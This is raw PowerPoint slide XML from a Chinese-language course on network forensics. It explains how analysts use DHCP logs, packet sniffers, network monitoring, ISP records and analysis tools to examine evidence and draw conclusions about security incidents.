              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）对网络取证有很大的作用，因为明显的袭击者或受害者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址可能已经被成千上万的主机用过了。但分析人员仍然能通过审查日志内容，决定哪个内部地址在使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="1708160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>记录每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址及其相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的分配，还有时间戳。这个信息能帮助分析人员辨别哪个主机用了一个特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址进行着一个活动。但是，分析人员应该注意一种可能，即在内部网络中的攻击者会伪造他们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，这是一种叫做欺骗（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）的行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．数据包嗅探器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在所有的网络通信数据源中，数据包嗅探器能收集网络活动最多的信息。但是，嗅探器可能也会捕获海量的“良性”数据——成百上千万的数据包——而且也没有任何关于哪个数据包可能包含恶意行为的提示。在大多数情况下，当事件已经被其他的设备和软件确定为有可能是恶意的前提下，数据包嗅探器最好用来提供更多的补充数据。一些机构会在一段时间内记录大多数或所有的数据包，以便当意外发生时有原始的网络数据用来检测和分析。最好由协议分析器审视数据包嗅探器的数据，并用协议标准和通常的实现方式来解释这些数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．网络监控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当辨认与正常网络流有极大偏差的数据时，网络监控软件是有用的，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，成百上千的系统同时向特殊的主机或网络发起攻击。网络监控软件记录下这些网络攻击对带宽和可用性的影响，以及明显的目标信息。网络流数据在调查由其他数据源确定的可疑活动时同样是有用的，例如，它可以显示一个特殊的通信模式在过去的几天或几个星期内是否发生过。</a:t>
            </a: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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息的主要作用在于追踪一个攻击源，特别当攻击使用欺骗的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址时。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、检测和分析的工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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因为网络取证能基于多种数据源类型，用于许多不同的目的，分析人员会在常规分析的基础上使用不同的工具，每种工具适合于特定的情况。分析人员应该知道所有可能的检查和分析网络通信数据的方法，针对每种情况选用最好的工具，而不是对每种情况都用一样的工具。分析人员也应该注意工具的不足，比如，一种特殊的协议分析器也许不能够解释某种协议或异常的协议数据（如非法数据域中的值）。如果分析人员有其它可备选的工具，这种不足或许能够避免。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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工具可以帮助过滤数据。比如，需要在没有具体信息的情况下搜索数据，这种情况在进行定期的或常规的安全事件数据日志和报警检查时最有可能发生。如果日志或报警的量很小，审查这些数据就相对容易些，但在有些情况下，每天也许会有成千的事件列入表中。</a:t>
            </a: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6.5.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>得出结论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="987574"/>
            <a:ext cx="7272808" cy="2723823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络取证的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最大挑战之一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是可得获取的数据不全面。在许多情况下，网络通信数据没有被记录，丢失了。尽管如此，通常分析人员还是应该视分析过程为系统的方法，在获取的数据和假设的基础上得出结论（基于技术知识和经验）。很多情况下，特别是有很多冗余数据源时，获取和分析关于事件的所有数据是不现实的。分析人员应该最终定位、检验和分析那些足够重现事件的数据，理解其重要性，决定其影响范围。在很多情况下，额外数据来自数据文件或主机操作系统而不是从网络通信相关的源中获得的。</a:t>
            </a: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6.5.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>得出结论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="987574"/>
            <a:ext cx="7272808" cy="3647152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通常情况下，分析人员应重点辨别攻击活动的主要特点，评估已造成的和可能造成的消极影响。如辨认一个外来入侵者的身份，通常需要大量时间，也难奏效，而且对改正运行问题或安全弱点也没有帮助。判定入侵者的意图也是很难的，如一个异常的连接试图可能由攻击者、恶意代码、错误配置的软件或者是不正确的击键等造成。尽管理解意图在一些情况下是重要的，但事件的消极影响更值得关注。确认攻击者的身份也许是很重要的，特别当犯罪事件发生时，但在有些情况下，这也需要和其他一些重要目的一起权衡考虑。调查的关注点应该由合适的参与者在开始时就制定，并决定确认查明攻击者的身份是否重要。</a:t>
            </a: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6.5.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>得出结论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="627534"/>
            <a:ext cx="8388424" cy="5816977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不仅要关注分析真实的事件，也应该理解错误警报产生的原因，进而使用更好的安全事件数据源，并提高检测的准确性。在网络取证得出结论前，要确保：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．规范化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：由于来源不同，相同的事件可能具有不同的名称或代码。规范化在于给出一致性的说明，同时，在证据链中也要建立规范化的描述。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
